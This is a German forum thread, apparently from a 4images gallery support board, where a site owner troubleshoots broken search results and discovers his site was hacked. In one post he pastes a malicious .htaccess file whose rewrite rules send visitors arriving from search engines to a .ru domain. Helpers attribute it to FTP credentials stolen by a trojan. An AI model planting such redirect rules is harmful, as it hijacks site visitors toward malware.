Author Topic: Suchfunktion findet Bilder,zeigt sie aber nicht an!  (Read 17899 times)

0 Members and 1 Guest are viewing this topic.

Offline eumel1602

  • Newbie
  • *
  • Posts: 26
    • View Profile
Suchfunktion findet Bilder,zeigt sie aber nicht an!
« on: August 28, 2012, 07:23:20 PM »
Hallo!
ich habe die Version 1.7.11 installiert und dann eine wiederherstellung von daten gemacht.
funktioniert eigentlich gut
aber:
die Suchfunktion findet zwar bilder auf die die Schlüßelwörter passen aber man kann sie nicht anklicken (im IE rotes kreuz) der FF stellt sie nicht dar.

Wenn ich also was suche zeigt er mir den tumpindex  an und im hintergrund sucht der immer weiter, versuche ich ein bild anzuklicken dauert es eine weile und die 4images bilderdatenbank geht nicht mehr und dieser fehler kommt:
Firefox kann keine Verbindung zu dem Server unter handwrittencry.net aufbauen.

Kann mir jemand helfen?

hier der link zum probieren:
http://www.ssvsayda.de/index.php?option=com_content&view=article&id=70&Itemid=89

Rembrandt

  • Guest
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #1 on: August 28, 2012, 10:08:27 PM »
Hi!
hm.. einige funktionieren andere nicht...
versuche mal in der includes/constants.php den pfad zur Galerie zu setzen:

// If 4images has problems to find out the right URL, define it here.
// define('SCRIPT_URL', 'http://www.yourdomain.com/4images'); //no trailing slash


mfg Andi

Offline eumel1602

  • Newbie
  • *
  • Posts: 26
    • View Profile
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #2 on: August 29, 2012, 08:05:20 PM »
danke für die versuchte hilfe.

jetzt funktioniert allerdings die Hauptseite der Bilderdatenbank gar nicht mehr!
siehe: http://www.ssvsayda.de/index.php?option=com_content&view=article&id=70&Itemid=89

einzelne unterseiten gehen aber noch:
siehe: http://www.ssvsayda.de/4images/categories.php?cat_id=326

eh was ist denn da los.  :o
www.ssvsayda.de/4images/index.php funktioniert einfach nicht mehr

Ich habe deinen Vorschlag jetzt wieder in das originalformat umgewandelt und hochgeladen... ändert nix mehr

Noch eine idee?
« Last Edit: August 29, 2012, 08:15:21 PM by eumel1602 »

Rembrandt

  • Guest
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #3 on: August 29, 2012, 08:53:13 PM »
Hi!
k.A. wo was nicht funktionieren soll, bei all deinen links im deinen post werden die Bilder angezeigt.

mfg Andi


Offline Jan-Lukas

  • Addicted member
  • ******
  • Posts: 1.289
    • View Profile
    • Discover the New World of Kindersurprise
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #4 on: August 29, 2012, 09:15:04 PM »
Quiz frage, wie viele Byte muss ein Bild haben damit es angezeigt werden kann  :wink:

Und die Rechtsklicksperre ist bei Windoof 7 ein Witz
« Last Edit: August 29, 2012, 09:28:31 PM by Jan-Lukas »
Danke Harald




Offline eumel1602

  • Newbie
  • *
  • Posts: 26
    • View Profile
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #5 on: August 30, 2012, 09:30:04 PM »
Hallo
@ Rembrandt:
Der fehler lag bei mir, der FF und der IE haben bei dem Link irgendwelche shit gemacht.
Nach neuinstallation dieser Browser funktionieren die Links auch bei mir wieder!

Mein Problem mit dem anzeigen der suche ergebnisbilder ist leider aber nicht gelöst.. ??



Quiz frage, wie viele Byte muss ein Bild haben damit es angezeigt werden kann  :wink:
Und die Rechtsklicksperre ist bei Windoof 7 ein Witz
-Lösung zur Quizfrage: die bilder sind (per ftp geschaut) alle über 10 kb -20 kb groß, sie funktionieren ja auch alle im normalbetrieb, nur eben bei der Suchfunktion nicht.. da muss es ja einen fehler geben.
definitiv sind die tumps nicht 0 kb !
-Rechtsklicksperre bedeutet ja nicht das das Fort Knox ist. einfach ne spielerrei die ca 80 % der user abhält die bilder zu klauen...
Ich weis nicht was dich das stört? ich weis selber das das ohne probleme umgangen werden kann... nur sind nun mal mind. 80 % von PC benutzern nicht soooo schlau wie der ein oder andere...

trotzdem danke das du mir versucht hast zu helfen!

Offline Jan-Lukas

  • Addicted member
  • ******
  • Posts: 1.289
    • View Profile
    • Discover the New World of Kindersurprise
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #6 on: August 30, 2012, 10:24:23 PM »
stört mich nicht, ist mir auch egal, hindert nur beim Fehlersuchen.
Danke Harald




Rembrandt

  • Guest
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #7 on: August 31, 2012, 05:52:42 AM »
sag mal hast du vielleicht einen SEO Mod installiert.
Wenn ich bei einen Thumbnail, das zuvor von der Suche gefunden wurde, auf die Kategorie klicke, komme ich auf die Google seite?

Offline eumel1602

  • Newbie
  • *
  • Posts: 26
    • View Profile
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #8 on: August 31, 2012, 03:17:11 PM »
sag mal hast du vielleicht einen SEO Mod installiert.
Wenn ich bei einen Thumbnail, das zuvor von der Suche gefunden wurde, auf die Kategorie klicke, komme ich auf die Google seite?

genau. wenn ich auf eine Kategorie (nach einer suchfunktion) klicke "dallt" der browser eine weile und bringt eine Fehlermeldung:
* Firefox kann keine Verbindung zu dem Server unter spamrelateddailymotion.info aufbauen * das ist bei dir dann eben ein google Link.

NEIN ich habe kein derartiges Mod installiert.
Bevor ich die 1.7.11 installiert hatte (danach mit wiederherstellungsdaten aus 1.7.7 vwersion) funktionierte die "Suche" super. also kein mod

Offline eumel1602

  • Newbie
  • *
  • Posts: 26
    • View Profile
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #9 on: September 06, 2012, 11:55:57 AM »
Ich muss hier nochmal fragen,
habe festgestellt (per FTP) das die .htaccess datei kürzlich (nicht von mir) geändert wurde. Pfad: "www.ssvsayda.de/4images/" die gehört doch dort gar nicht hin oder???????
hab sie runtergeladen und aufgemacht, folgendes steht drin:
Code: [Select]
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*) RewriteRule ^(.*)$ http://wayoseswindows.ru/Tech?8 [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://wayoseswindows.ru/Tech?8 [R=301,L]
</IfModule>
da wurde doch was gehackt !
WER KANN HELFEN ??

P.s.: mein ftp passwort wurde erstmal geändert... ob das was hilft weis ich nicht...

« Last Edit: September 06, 2012, 02:25:38 PM by Rembrandt »

Rembrandt

  • Guest
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #10 on: September 06, 2012, 02:24:53 PM »
..
da wurde doch was gehackt !
...
dann durchsuch doch mal deinen Pc nach Trojaner..
die originale htaccess datei findest du im downloadpaket von 4images..

mfg Andi

Offline eumel1602

  • Newbie
  • *
  • Posts: 26
    • View Profile
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #11 on: September 06, 2012, 02:43:33 PM »
..
da wurde doch was gehackt !
...
dann durchsuch doch mal deinen Pc nach Trojaner..
die originale htaccess datei findest du im downloadpaket von 4images..
mfg Andi
läuft seit 1 h die virusuntersucheung, hab die fehlerdatei gelöscht...
die neue einfach auf den server schmeisen aus dem originalpaket? Wo genau liegt sie... ich finde sie nicht im originalpaket...
die befallene datei kommt auch immer wieder.. die lücke ist noch offen

Rembrandt

  • Guest
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #12 on: September 06, 2012, 03:20:51 PM »
... ... ich finde sie nicht im originalpaket...
die befallene datei kommt auch immer wieder.. die lücke ist noch offen
mein fehler die gibt es gar nicht im Paket,
Wenn du keinen Mod hast, wie den schon erwähnten SEO Mod z.b, dann lösche die Datei.

Wenn du sie löscht und sie kommt immer wieder, wird dein PC noch immer verseucht sein.

Das FTP passwort ändern bringt dir nichts solange du deinen PC nicht bereingt hast.

mfg Andi

Edit: dort war ein ähnliches Problem, das gleiche gilt für dich:
http://www.4homepages.de/forum/index.php?topic=30677.msg161395#msg161395

Offline eumel1602

  • Newbie
  • *
  • Posts: 26
    • View Profile
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #13 on: September 09, 2012, 09:12:01 AM »
...keinen Mod hast, wie den schon erwähnten SEO Mod z.b, dann lösche die Datei.
Wenn du sie löscht und sie kommt immer wieder, wird dein PC noch immer verseucht sein.
Das FTP passwort ändern bringt dir nichts solange du deinen PC nicht bereingt hast.

mfg Andi

Edit: dort war ein ähnliches Problem, das gleiche gilt für dich:
http://www.4homepages.de/forum/index.php?topic=30677.msg161395#msg161395
Danke für Hilfe,
aktueller stand: datei kommt immer wieder.

PC mit drei Onlinescanner bereinigt... (sie fanden insgesamt zwei schaddatein)
Nach dem löschen des FTP Programms (WS_ftp Pro 8.2) funktionierte in der Bilderdatenbank die suchfunktion wieder (bilder und links der kategorien)
leider hielt das nicht lange an nach dem einsetzten des neuen FTP programms (FlashFXP) brachte mein virus programm fehlermeldung:
PDM.invader (loader) gefunden und zugelassen...
Bemerkung: /diesen fehler bekam ich über jahre auch schon bei ws_ftp pro von meinem virusprogramm angezeigt ohne probleme zu haben)

danach tauchten die selben probleme in der suchfunktion (bis auf die weiterleitungsprobleme) und die schaddatei (htaccess) auf dem server wieder auf

@ rembrandt, der link in deinem edit ist für mich zwar verständlich aber es übersteigt auch meine (programierkenntnisse) außerdem habe ich ja auch noch kein fehlercode gefunden.

weitere Fragen:
- eine Website, wie im link beschrieben, mit einem onlinescan auf Viren zu überprüfen kann ich nix im netz finden ?
- wo kann man eigentlich den zugangsdaten zum admin control panel der bilderdatenbank ändern ??
- welche attribute muss die config.php (pfad 4images/) haben ?? meine hat 666 , alle anderen datein haben 644
- unter dem pfad: html/4images/data/database/ gibt es ebenfalls eine ".htaccess" datei (attribute 777) in der stehen nur 2 zeilen drin, Inhalt: "deny from all"  was ist denn das?
« Last Edit: September 09, 2012, 09:30:49 AM by eumel1602 »

Rembrandt

  • Guest
Re: Suchfunktion findet Bilder,zeigt sie aber nicht an!
« Reply #14 on: September 09, 2012, 01:02:37 PM »
.....- eine Website, wie im link beschrieben, mit einem onlinescan auf Viren zu überprüfen kann ich nix im netz finden ?
das ist doch alles keine Quantenphysik, lade dir die test version herrunter und überprüfe endlich deinen PC.
.. wo kann man eigentlich den zugangsdaten zum admin control panel der bilderdatenbank ändern ??
meinst du jetzt die Datenbank, da mußt du dich bei deinen Provider einlogen..
- welche attribute muss die config.php (pfad 4images/) haben ?? meine hat 666 , alle anderen datein haben 644
siehe docs/installation.deutsch.txt
- unter dem pfad: html/4images/data/database/ gibt es ebenfalls eine ".htaccess" datei (attribute 777) in der stehen nur 2 zeilen drin, Inhalt: "deny from all"  was ist denn das?
das gehört so, damit kein direktaufruf von diesen Daten  erfolgen kann.

mfg Andi